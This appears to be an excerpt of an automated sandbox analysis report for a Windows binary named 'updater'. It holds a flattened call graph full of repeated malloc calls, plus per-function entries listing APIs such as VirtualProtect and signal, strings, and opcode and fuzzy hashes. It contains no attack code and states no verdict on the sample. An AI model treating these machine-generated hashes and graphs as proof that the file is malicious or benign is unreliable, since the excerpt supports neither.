7ff72af214a9 3871->3872 3873 7ff72af21394 malloc 3872->3873 3874 7ff72af214b8 3873->3874 3875 7ff72af21394 malloc 3874->3875 3876 7ff72af214c7 3875->3876 3877 7ff72af21394 malloc 3876->3877 3878 7ff72af214d6 3877->3878 3879 7ff72af21394 malloc 3878->3879 3880 7ff72af214e5 3879->3880 3881 7ff72af21394 malloc 3880->3881 3882 7ff72af214f4 3881->3882 3883 7ff72af21394 malloc 3882->3883 3884 7ff72af21503 3883->3884 3885 7ff72af21394 malloc 3884->3885 3886 7ff72af21512 3885->3886 3887 7ff72af21394 malloc 3886->3887 3888 7ff72af21521 3887->3888 3889 7ff72af21530 3888->3889 3890 7ff72af21394 malloc 3888->3890 3891 7ff72af21394 malloc 3889->3891 3890->3889 3892 7ff72af2153a 3891->3892 3893 7ff72af21394 malloc 3892->3893 3894 7ff72af2153f 3893->3894 3895 7ff72af21394 malloc 3894->3895 3896 7ff72af2154e 3895->3896 3897 7ff72af21394 malloc 3896->3897 3898 7ff72af2155d 3897->3898 3899 7ff72af21394 malloc 3898->3899 3900 7ff72af2156c 3899->3900 3901 7ff72af21394 malloc 3900->3901 3902 7ff72af2157b 3901->3902 3903 7ff72af21394 malloc 3902->3903 3904 7ff72af2158a 3903->3904 3905 7ff72af21394 malloc 3904->3905 3906 7ff72af21599 3905->3906 3907 7ff72af21394 malloc 3906->3907 3908 7ff72af215a8 3907->3908 3909 7ff72af21394 malloc 3908->3909 3910 7ff72af215b7 3909->3910 3911 7ff72af21394 malloc 3910->3911 3912 7ff72af215c6 3911->3912 3913 7ff72af21394 malloc 3912->3913 3914 7ff72af215d5 3913->3914 3915 7ff72af21394 malloc 3914->3915 3916 7ff72af215e4 3915->3916 3917 7ff72af21394 malloc 3916->3917 3918 7ff72af215f3 3917->3918 3918->3359 3919 7ff72af2149a 3918->3919 3920 7ff72af21394 malloc 3919->3920 3921 7ff72af214a9 3920->3921 3922 7ff72af21394 malloc 3921->3922 3923 7ff72af214b8 3922->3923 3924 7ff72af21394 malloc 3923->3924 3925 7ff72af214c7 3924->3925 3926 7ff72af21394 malloc 3925->3926 3927 7ff72af214d6 3926->3927 3928 7ff72af21394 malloc 3927->3928 3929 7ff72af214e5 3928->3929 3930 7ff72af21394 malloc 3929->3930 3931 7ff72af214f4 3930->3931 3932 7ff72af21394 malloc 3931->3932 3933 7ff72af21503 3932->3933 3934 7ff72af21394 malloc 3933->3934 3935 7ff72af21512 3934->3935 3936 7ff72af21394 malloc 3935->3936 3937 7ff72af21521 3936->3937 3938 7ff72af21530 3937->3938 3939 7ff72af21394 malloc 3937->3939 3940 7ff72af21394 malloc 3938->3940 3939->3938 3941 7ff72af2153a 3940->3941 3942 7ff72af21394 malloc 3941->3942 3943 7ff72af2153f 3942->3943 3944 7ff72af21394 malloc 3943->3944 3945 7ff72af2154e 3944->3945 3946 7ff72af21394 malloc 3945->3946 3947 7ff72af2155d 3946->3947 3948 7ff72af21394 malloc 3947->3948 3949 7ff72af2156c 3948->3949 3950 7ff72af21394 malloc 3949->3950 3951 7ff72af2157b 3950->3951 3952 7ff72af21394 malloc 3951->3952 3953 7ff72af2158a 3952->3953 3954 7ff72af21394 malloc 3953->3954 3955 7ff72af21599 3954->3955 3956 7ff72af21394 malloc 3955->3956 3957 7ff72af215a8 3956->3957 3958 7ff72af21394 malloc 3957->3958 3959 7ff72af215b7 3958->3959 3960 7ff72af21394 malloc 3959->3960 3961 7ff72af215c6 3960->3961 3962 7ff72af21394 malloc 3961->3962 3963 7ff72af215d5 3962->3963 3964 7ff72af21394 malloc 3963->3964 3965 7ff72af215e4 3964->3965 3966 7ff72af21394 malloc 3965->3966 3967 7ff72af215f3 3966->3967 3967->3359 3967->3363 3969 7ff72af21394 malloc 3968->3969 3970 7ff72af2148b 3969->3970 3971 7ff72af21394 malloc 3970->3971 3972 7ff72af2149a 3971->3972 3973 7ff72af21394 malloc 3972->3973 3974 7ff72af214a9 3973->3974 3975 7ff72af21394 malloc 3974->3975 3976 7ff72af214b8 3975->3976 3977 7ff72af21394 malloc 3976->3977 3978 7ff72af214c7 3977->3978 3979 7ff72af21394 malloc 3978->3979 3980 7ff72af214d6 3979->3980 3981 7ff72af21394 malloc 3980->3981 3982 7ff72af214e5 3981->3982 3983 7ff72af21394 malloc 3982->3983 3984 7ff72af214f4 3983->3984 3985 7ff72af21394 malloc 3984->3985 3986 7ff72af21503 3985->3986 3987 7ff72af21394 malloc 3986->3987 3988 7ff72af21512 3987->3988 3989 7ff72af21394 malloc 3988->3989 3990 7ff72af21521 3989->3990 3991 7ff72af21530 3990->3991 3992 7ff72af21394 malloc 3990->3992 3993 7ff72af21394 malloc 3991->3993 3992->3991 3994 7ff72af2153a 3993->3994 3995 7ff72af21394 malloc 3994->3995 3996 7ff72af2153f 3995->3996 3997 7ff72af21394 malloc 3996->3997 3998 7ff72af2154e 3997->3998 3999 7ff72af21394 malloc 3998->3999 4000 7ff72af2155d 3999->4000 4001 7ff72af21394 malloc 4000->4001 4002 7ff72af2156c 4001->4002 4003 7ff72af21394 malloc 4002->4003 4004 7ff72af2157b 4003->4004 4005 7ff72af21394 malloc 4004->4005 4006 7ff72af2158a 4005->4006 4007 7ff72af21394 malloc 4006->4007 4008 7ff72af21599 4007->4008 4009 7ff72af21394 malloc 4008->4009 4010 7ff72af215a8 4009->4010 4011 7ff72af21394 malloc 4010->4011 4012 7ff72af215b7 4011->4012 4013 7ff72af21394 malloc 4012->4013 4014 7ff72af215c6 4013->4014 4015 7ff72af21394 malloc 4014->4015 4016 7ff72af215d5 4015->4016 4017 7ff72af21394 malloc 4016->4017 4018 7ff72af215e4 4017->4018 4019 7ff72af21394 malloc 4018->4019 4020 7ff72af215f3 4019->4020 4020->3368 4022 7ff72af21394 malloc 4021->4022 4023 7ff72af215d5 4022->4023 4024 7ff72af21394 malloc 4023->4024 4025 7ff72af215e4 4024->4025 4026 7ff72af21394 malloc 4025->4026 4027 7ff72af215f3 4026->4027 4027->3369 4029 7ff72af21422 4028->4029 4030 7ff72af21394 malloc 4028->4030 4031 7ff72af21394 malloc 4029->4031 4030->4029 4032 7ff72af2142c 4031->4032 4033 7ff72af21431 4032->4033 4034 7ff72af21394 malloc 4032->4034 4035 7ff72af21394 malloc 4033->4035 4034->4033 4036 7ff72af2143b 4035->4036 4037 7ff72af21440 4036->4037 4038 7ff72af21394 malloc 4036->4038 4039 7ff72af21394 malloc 4037->4039 4038->4037 4040 7ff72af2144f 4039->4040 4041 7ff72af21394 malloc 4040->4041 4042 7ff72af2145e 4041->4042 4043 7ff72af21394 malloc 4042->4043 4044 7ff72af2146d 4043->4044 4045 7ff72af21394 malloc 4044->4045 4046 7ff72af2147c 4045->4046 4047 7ff72af21394 malloc 4046->4047 4048 7ff72af2148b 4047->4048 4049 7ff72af21394 malloc 4048->4049 4050 7ff72af2149a 4049->4050 4051 7ff72af21394 malloc 4050->4051 4052 7ff72af214a9 4051->4052 4053 7ff72af21394 malloc 4052->4053 4054 7ff72af214b8 4053->4054 4055 7ff72af21394 malloc 4054->4055 4056 7ff72af214c7 4055->4056 4057 7ff72af21394 malloc 4056->4057 4058 7ff72af214d6 4057->4058 4059 7ff72af21394 malloc 4058->4059 4060 7ff72af214e5 4059->4060 4061 7ff72af21394 malloc 4060->4061 4062 7ff72af214f4 4061->4062 4063 7ff72af21394 malloc 4062->4063 4064 7ff72af21503 4063->4064 4065 7ff72af21394 malloc 4064->4065 4066 7ff72af21512 4065->4066 4067 7ff72af21394 malloc 4066->4067 4068 7ff72af21521 4067->4068 4069 7ff72af21530 4068->4069 4070 7ff72af21394 malloc 4068->4070 4071 7ff72af21394 malloc 4069->4071 4070->4069 4072 7ff72af2153a 4071->4072 4073 7ff72af21394 malloc 4072->4073 4074 7ff72af2153f 4073->4074 4075 7ff72af21394 malloc 4074->4075 4076 7ff72af2154e 4075->4076 4077 7ff72af21394 malloc 4076->4077 4078 7ff72af2155d 4077->4078 4079 7ff72af21394 malloc 4078->4079 4080 7ff72af2156c 4079->4080 4081 7ff72af21394 malloc 4080->4081 4082 7ff72af2157b 4081->4082 4083 7ff72af21394 malloc 4082->4083 4084 7ff72af2158a 4083->4084 4085 7ff72af21394 malloc 4084->4085 4086 7ff72af21599 4085->4086 4087 7ff72af21394 malloc 4086->4087 4088 7ff72af215a8 4087->4088 4089 7ff72af21394 malloc 4088->4089 4090 7ff72af215b7 4089->4090 4091 7ff72af21394 malloc 4090->4091 4092 7ff72af215c6 4091->4092 4093 7ff72af21394 malloc 4092->4093 4094 7ff72af215d5 4093->4094 4095 7ff72af21394 malloc 4094->4095 4096 7ff72af215e4 4095->4096 4097 7ff72af21394 malloc 4096->4097 4098 7ff72af215f3 4097->4098 4098->3417 4105 7ff72af22320 strlen 4106 7ff72af22337 4105->4106 4170 7ff72af21000 4171 7ff72af2108b __set_app_type 4170->4171 4172 7ff72af21040 4170->4172 4173 7ff72af210b6 4171->4173 4172->4171 4174 7ff72af210e5 4173->4174 4176 7ff72af21e00 4173->4176 4177 7ff72af28d40 __setusermatherr 4176->4177 4178 7ff72af21800 4179 7ff72af21812 4178->4179 4180 7ff72af21835 fprintf 4179->4180 4181 7ff72af22104 4182 7ff72af22218 4181->4182 4183 7ff72af22111 EnterCriticalSection 4181->4183 4184 7ff72af22272 4182->4184 4186 7ff72af22241 DeleteCriticalSection 4182->4186 4188 7ff72af22230 free 4182->4188 4185 7ff72af2220b LeaveCriticalSection 4183->4185 4189 7ff72af2212e 4183->4189 4185->4182 4186->4184 4187 7ff72af2214d TlsGetValue GetLastError 4187->4189 4188->4186 4188->4188 4189->4185 4189->4187 4115 7ff72af21ac3 4116 7ff72af21a70 4115->4116 4117 7ff72af2199e 4116->4117 4118 7ff72af21b36 4116->4118 4121 7ff72af21b53 4116->4121 4119 7ff72af21a0f 4117->4119 4122 7ff72af219e9 VirtualProtect 4117->4122 4120 7ff72af21ba0 4 API calls 4118->4120 4120->4121 4122->4117 4154 7ff72af21e65 4155 7ff72af21e67 signal 4154->4155 4156 7ff72af21e7c 4155->4156 4158 7ff72af21e99 4155->4158 4157 7ff72af21e82 signal 4156->4157 4156->4158 4157->4158 4128 7ff72af22050 4129 7ff72af2205e EnterCriticalSection 4128->4129 4130 7ff72af220cf 4128->4130 4131 7ff72af220c2 LeaveCriticalSection 4129->4131 4132 7ff72af22079 4129->4132 4131->4130 4132->4131 4133 7ff72af220bd free 4132->4133 4133->4131 4134 7ff72af21fd0 4135 7ff72af22033 4134->4135 4136 7ff72af21fe4 4134->4136 4136->4135 4137 7ff72af21ffd EnterCriticalSection LeaveCriticalSection 4136->4137 4137->4135 4159 7ff72af21a70 4160 7ff72af2199e 4159->4160 4164 7ff72af21a7d 4159->4164 4161 7ff72af21a0f 4160->4161 4162 7ff72af219e9 VirtualProtect 4160->4162 4162->4160 4163 7ff72af21b53 4164->4159 4164->4163 4165 7ff72af21b36 4164->4165 4166 7ff72af21ba0 4 API calls 4165->4166 4166->4163 4190 7ff72af21e10 4191 7ff72af21e2f 4190->4191 4192 7ff72af21eb5 4191->4192 4193 7ff72af21ecc 4191->4193 4196 7ff72af21e55 4191->4196 4193->4192 4194 7ff72af21ed3 signal 4193->4194 4194->4192 4195 7ff72af21ee4 4194->4195 4195->4192 4197 7ff72af21eea signal 4195->4197 4196->4192 4198 7ff72af21f12 signal 4196->4198 4197->4192 4198->4192 4167 7ff72af2216f 4168 7ff72af22178 InitializeCriticalSection 4167->4168 4169 7ff72af22185 4167->4169 4168->4169 4107 7ff72af21ab3 4111 7ff72af21a70 4107->4111 4108 7ff72af2199e 4110 7ff72af21a0f 4108->4110 4113 7ff72af219e9 VirtualProtect 4108->4113 4109 7ff72af21b36 4112 7ff72af21ba0 4 API calls 4109->4112 4111->4107 4111->4108 4111->4109 4114 7ff72af21b53 4111->4114 4112->4114 4113->4108

                                                                          Executed Functions

                                                                          Function 00007FF72AF21160 Relevance: 13.6, APIs: 9, Instructions: 130sleepstringCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000001C.00000002.2443890985.00007FF72AF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF72AF20000, based on PE: true
                                                                          • Associated: 0000001C.00000002.2443853890.00007FF72AF20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                          • Associated: 0000001C.00000002.2443968858.00007FF72AF29000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                          • Associated: 0000001C.00000002.2444024582.00007FF72AF2B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                          • Associated: 0000001C.00000002.2444683131.00007FF72B1DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_28_2_7ff72af20000_updater.jbxd
                                                                          Similarity
                                                                          • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                                                          • String ID:
                                                                          • API String ID: 2643109117-0
                                                                          • Opcode ID: c996e7a35bf803568ca43188fa743fd5e2d0011960c1ad381c257ca82b16660a
                                                                          • Instruction ID: e7b4a29f77c79d9115b85e5e0f305e084bffcd74e063cc3023abd2ed82ccb677
                                                                          • Opcode Fuzzy Hash: c996e7a35bf803568ca43188fa743fd5e2d0011960c1ad381c257ca82b16660a
                                                                          • Instruction Fuzzy Hash: 0B515731A0964786F710BB69ED903B9A3A4EF89794FC050B1C94D473A1DF3CE6458B28

                                                                          Non-executed Functions

                                                                          Function 00007FF72AF23350 Relevance: 21.2, APIs: 9, Strings: 5, Instructions: 206COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001C.00000002.2443890985.00007FF72AF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF72AF20000, based on PE: true
                                                                          • Associated: 0000001C.00000002.2443853890.00007FF72AF20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                          • Associated: 0000001C.00000002.2443968858.00007FF72AF29000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                          • Associated: 0000001C.00000002.2444024582.00007FF72AF2B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                          • Associated: 0000001C.00000002.2444683131.00007FF72B1DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_28_2_7ff72af20000_updater.jbxd
                                                                          Similarity
                                                                          • API ID: memset$wcscatwcscpywcslen
                                                                          • String ID: $0$0$@$@
                                                                          • API String ID: 4263182637-1413854666
                                                                          • Opcode ID: 1ebfceb6ccbc61bfdc6d1d73518e072520c38c1920a0aba60a62dff29e637d97
                                                                          • Instruction ID: 62d990e6ac8d36f22e9b0b2a4253957d459964a79d5d5f1b51f462d7e6cad867
                                                                          • Opcode Fuzzy Hash: 1ebfceb6ccbc61bfdc6d1d73518e072520c38c1920a0aba60a62dff29e637d97
                                                                          • Instruction Fuzzy Hash: F7B19F6190C6C296F721AB18F8453AAF7A0FF91348F801275EA8C536A5DF7DD249CF50
                                                                          Function 00007FF72AF22690 Relevance: 19.6, APIs: 8, Strings: 3, Instructions: 322COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001C.00000002.2443890985.00007FF72AF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF72AF20000, based on PE: true
                                                                          • Associated: 0000001C.00000002.2443853890.00007FF72AF20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                          • Associated: 0000001C.00000002.2443968858.00007FF72AF29000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                          • Associated: 0000001C.00000002.2444024582.00007FF72AF2B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                          • Associated: 0000001C.00000002.2444683131.00007FF72B1DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_28_2_7ff72af20000_updater.jbxd
                                                                          Similarity
                                                                          • API ID: wcslen$memsetwcscatwcscpywcsncmp
                                                                          • String ID: 0$X$`
                                                                          • API String ID: 329590056-2527496196
                                                                          • Opcode ID: 8dd9b4d9794abecbbce3b974b874b08a77c89a1688d8793b7a9d9c155a3acde6
                                                                          • Instruction ID: 55ea07b4aa8551e0d5e40d18f80e182288c0e4c0f1d3f50816dbb91be030659c
                                                                          • Opcode Fuzzy Hash: 8dd9b4d9794abecbbce3b974b874b08a77c89a1688d8793b7a9d9c155a3acde6
                                                                          • Instruction Fuzzy Hash: 54028072908B8682F720AB19E8443AAB7A0FB85794F804375DAAC477E5DF3CD245CB54
                                                                          Function 00007FF72AF21BA0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 106memoryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • VirtualQuery.KERNEL32(?,?,?,?,00007FF72AF2A694,00007FF72AF2A694,?,?,00007FF72AF20000,?,00007FF72AF21991), ref: 00007FF72AF21C63
                                                                          • VirtualProtect.KERNEL32(?,?,?,?,00007FF72AF2A694,00007FF72AF2A694,?,?,00007FF72AF20000,?,00007FF72AF21991), ref: 00007FF72AF21CC7
                                                                          • memcpy.MSVCRT(?,?,?,?,00007FF72AF2A694,00007FF72AF2A694,?,?,00007FF72AF20000,?,00007FF72AF21991), ref: 00007FF72AF21CE0
                                                                          • GetLastError.KERNEL32(?,?,?,?,00007FF72AF2A694,00007FF72AF2A694,?,?,00007FF72AF20000,?,00007FF72AF21991), ref: 00007FF72AF21D23
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001C.00000002.2443890985.00007FF72AF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF72AF20000, based on PE: true
                                                                          • Associated: 0000001C.00000002.2443853890.00007FF72AF20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                          • Associated: 0000001C.00000002.2443968858.00007FF72AF29000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                          • Associated: 0000001C.00000002.2444024582.00007FF72AF2B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                          • Associated: 0000001C.00000002.2444683131.00007FF72B1DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_28_2_7ff72af20000_updater.jbxd
                                                                          Similarity
                                                                          • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                                                          • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                                          • API String ID: 2595394609-2123141913
                                                                          • Opcode ID: 8a554a6fa389011197ec1d316fb9bfbcb4cc07135e3b9ec9b47a0c356bf0b17d
                                                                          • Instruction ID: 141a803084e2bfbe80d792c0165ea482ccb509333279e557d1122bd5403dde7a
                                                                          • Opcode Fuzzy Hash: 8a554a6fa389011197ec1d316fb9bfbcb4cc07135e3b9ec9b47a0c356bf0b17d
                                                                          • Instruction Fuzzy Hash: 1B41C575A0864783FB10AB55EC406B9A760EF95BC4FD540B2CD4D437A1DE3CE689CB28
                                                                          Function 00007FF72AF238B0 Relevance: 10.6, APIs: 4, Strings: 3, Instructions: 123COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001C.00000002.2443890985.00007FF72AF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF72AF20000, based on PE: true
                                                                          • Associated: 0000001C.00000002.2443853890.00007FF72AF20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                          • Associated: 0000001C.00000002.2443968858.00007FF72AF29000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                          • Associated: 0000001C.00000002.2444024582.00007FF72AF2B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                          • Associated: 0000001C.00000002.2444683131.00007FF72B1DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_28_2_7ff72af20000_updater.jbxd
                                                                          Similarity
                                                                          • API ID: memsetwcscatwcscpywcslen
                                                                          • String ID: $0$@
                                                                          • API String ID: 468205783-2347541974
                                                                          • Opcode ID: 659bee40769b99f3727e1d647f561d414f9a26e08f9d5cb18db75b3f823b1ed2
                                                                          • Instruction ID: c291306063df9ae3f1cdccfb251be4cdc114f349684664a7519f3cbfc462e500
                                                                          • Opcode Fuzzy Hash: 659bee40769b99f3727e1d647f561d414f9a26e08f9d5cb18db75b3f823b1ed2
                                                                          • Instruction Fuzzy Hash: B861606291C6C286F720AB18F8453ABF7A0EB95394F900275EA8C42AA5DF7DD245CF14
                                                                          Function 00007FF72AF22104 Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000001C.00000002.2443890985.00007FF72AF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF72AF20000, based on PE: true
                                                                          • Associated: 0000001C.00000002.2443853890.00007FF72AF20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                          • Associated: 0000001C.00000002.2443968858.00007FF72AF29000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                          • Associated: 0000001C.00000002.2444024582.00007FF72AF2B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                          • Associated: 0000001C.00000002.2444683131.00007FF72B1DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_28_2_7ff72af20000_updater.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalSection$DeleteEnterErrorLastLeaveValuefree
                                                                          • String ID:
                                                                          • API String ID: 3326252324-0
                                                                          • Opcode ID: b536a55527d214355ccdc22c4662103ecafd3a57f3d1ce3f70d4549eef9b577b
                                                                          • Instruction ID: c664a024e6741b5c717b1cd42b54da2a1e55f251c4f83b6f9883925e72483dda
                                                                          • Opcode Fuzzy Hash: b536a55527d214355ccdc22c4662103ecafd3a57f3d1ce3f70d4549eef9b577b
                                                                          • Instruction Fuzzy Hash: 2621F420A49A4393FB19BB05ED80738E360EF51B94FC401B1C90E476B0DF2DFA858B20
                                                                          Function 00007FF72AF21E10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 672 7ff72af21e10-7ff72af21e2d 673 7ff72af21e3e-7ff72af21e48 672->673 674 7ff72af21e2f-7ff72af21e38 672->674 676 7ff72af21e4a-7ff72af21e53 673->676 677 7ff72af21ea3-7ff72af21ea8 673->677 674->673 675 7ff72af21f60-7ff72af21f69 674->675 679 7ff72af21ecc-7ff72af21ed1 676->679 680 7ff72af21e55-7ff72af21e60 676->680 677->675 678 7ff72af21eae-7ff72af21eb3 677->678 681 7ff72af21efb-7ff72af21f0a call 7ff72af28d50 678->681 682 7ff72af21eb5-7ff72af21eba 678->682 683 7ff72af21f23-7ff72af21f2d 679->683 684 7ff72af21ed3-7ff72af21ee2 signal 679->684 680->677 681->683 694 7ff72af21f0c-7ff72af21f10 681->694 682->675 685 7ff72af21ec0 682->685 686 7ff72af21f2f-7ff72af21f3f 683->686 687 7ff72af21f43-7ff72af21f45 683->687 684->683 688 7ff72af21ee4-7ff72af21ee8 684->688 685->683 693 7ff72af21f5a 686->693 687->675 690 7ff72af21eea-7ff72af21ef9 signal 688->690 691 7ff72af21f4e-7ff72af21f53 688->691 690->675 691->693 693->675 695 7ff72af21f12-7ff72af21f21 signal 694->695 696 7ff72af21f55 694->696 695->675 695->683 696->693
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001C.00000002.2443890985.00007FF72AF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF72AF20000, based on PE: true
                                                                          • Associated: 0000001C.00000002.2443853890.00007FF72AF20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                          • Associated: 0000001C.00000002.2443968858.00007FF72AF29000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                          • Associated: 0000001C.00000002.2444024582.00007FF72AF2B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                          • Associated: 0000001C.00000002.2444683131.00007FF72B1DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_28_2_7ff72af20000_updater.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: CCG
                                                                          • API String ID: 0-1584390748
                                                                          • Opcode ID: 81cc92ec2fa6e04c40e525b18e1cc1ff4a5f4b230223796d890c278b07bd10c2
                                                                          • Instruction ID: 7c35c1ac9ff6c9047349f380bb7f3f0b69e98b5396770db100ff47b12531985a
                                                                          • Opcode Fuzzy Hash: 81cc92ec2fa6e04c40e525b18e1cc1ff4a5f4b230223796d890c278b07bd10c2
                                                                          • Instruction Fuzzy Hash: 7221AE31E0954643FB7472189D9037A9181DF847A4FE485B1DE2D433E4DE2CEE898A6C
                                                                          Function 00007FF72AF21880 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138memoryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 697 7ff72af21880-7ff72af2189c 698 7ff72af21a0f-7ff72af21a1f 697->698 699 7ff72af218a2-7ff72af218f9 call 7ff72af22420 call 7ff72af22660 697->699 699->698 704 7ff72af218ff-7ff72af21910 699->704 705 7ff72af2193e-7ff72af21941 704->705 706 7ff72af21912-7ff72af2191c 704->706 708 7ff72af2194d-7ff72af21954 705->708 709 7ff72af21943-7ff72af21947 705->709 707 7ff72af2191e-7ff72af21929 706->707 706->708 707->708 710 7ff72af2192b-7ff72af2193a 707->710 712 7ff72af2199e-7ff72af219a6 708->712 713 7ff72af21956-7ff72af21961 708->713 709->708 711 7ff72af21a20-7ff72af21a26 709->711 710->705 714 7ff72af21b87-7ff72af21b98 call 7ff72af21d40 711->714 715 7ff72af21a2c-7ff72af21a37 711->715 712->698 716 7ff72af219a8-7ff72af219c1 712->716 717 7ff72af21970-7ff72af2199c call 7ff72af21ba0 713->717 715->712 718 7ff72af21a3d-7ff72af21a5f 715->718 719 7ff72af219df-7ff72af219e7 716->719 717->712 722 7ff72af21a7d-7ff72af21a97 718->722 723 7ff72af219e9-7ff72af21a0d VirtualProtect 719->723 724 7ff72af219d0-7ff72af219dd 719->724 727 7ff72af21a9d-7ff72af21afa 722->727 728 7ff72af21b74-7ff72af21b82 call 7ff72af21d40 722->728 723->724 724->698 724->719 734 7ff72af21afc-7ff72af21b0e 727->734 735 7ff72af21b22-7ff72af21b26 727->735 728->714 736 7ff72af21b5c-7ff72af21b6c 734->736 737 7ff72af21b10-7ff72af21b20 734->737 738 7ff72af21b2c-7ff72af21b30 735->738 739 7ff72af21a70-7ff72af21a77 735->739 736->728 740 7ff72af21b6f call 7ff72af21d40 736->740 737->735 737->736 738->739 741 7ff72af21b36-7ff72af21b53 call 7ff72af21ba0 738->741 739->712 739->722 740->728 741->736
                                                                          APIs
                                                                          • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF72AF21247), ref: 00007FF72AF219F9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001C.00000002.2443890985.00007FF72AF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF72AF20000, based on PE: true
                                                                          • Associated: 0000001C.00000002.2443853890.00007FF72AF20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                          • Associated: 0000001C.00000002.2443968858.00007FF72AF29000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                          • Associated: 0000001C.00000002.2444024582.00007FF72AF2B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                          • Associated: 0000001C.00000002.2444683131.00007FF72B1DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_28_2_7ff72af20000_updater.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                                                          • API String ID: 544645111-395989641
                                                                          • Opcode ID: f55d23e6802c9323605da89ae8314c5a5c300cb13031396fec444b8fb4cb03df
                                                                          • Instruction ID: bfac6cfdfc8c26389d4059d5f0efc5962f16ab27a48e0a8a206f365e0c887452
                                                                          • Opcode Fuzzy Hash: f55d23e6802c9323605da89ae8314c5a5c300cb13031396fec444b8fb4cb03df
                                                                          • Instruction Fuzzy Hash: 18513C32E48546D7FB10AB25EC407B8B761EB15B98F844171D91C077A4CA3CEA9ACF28
                                                                          Function 00007FF72AF21800 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 744 7ff72af21800-7ff72af21810 745 7ff72af21812-7ff72af21822 744->745 746 7ff72af21824 744->746 747 7ff72af2182b-7ff72af21867 call 7ff72af22290 fprintf 745->747 746->747
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
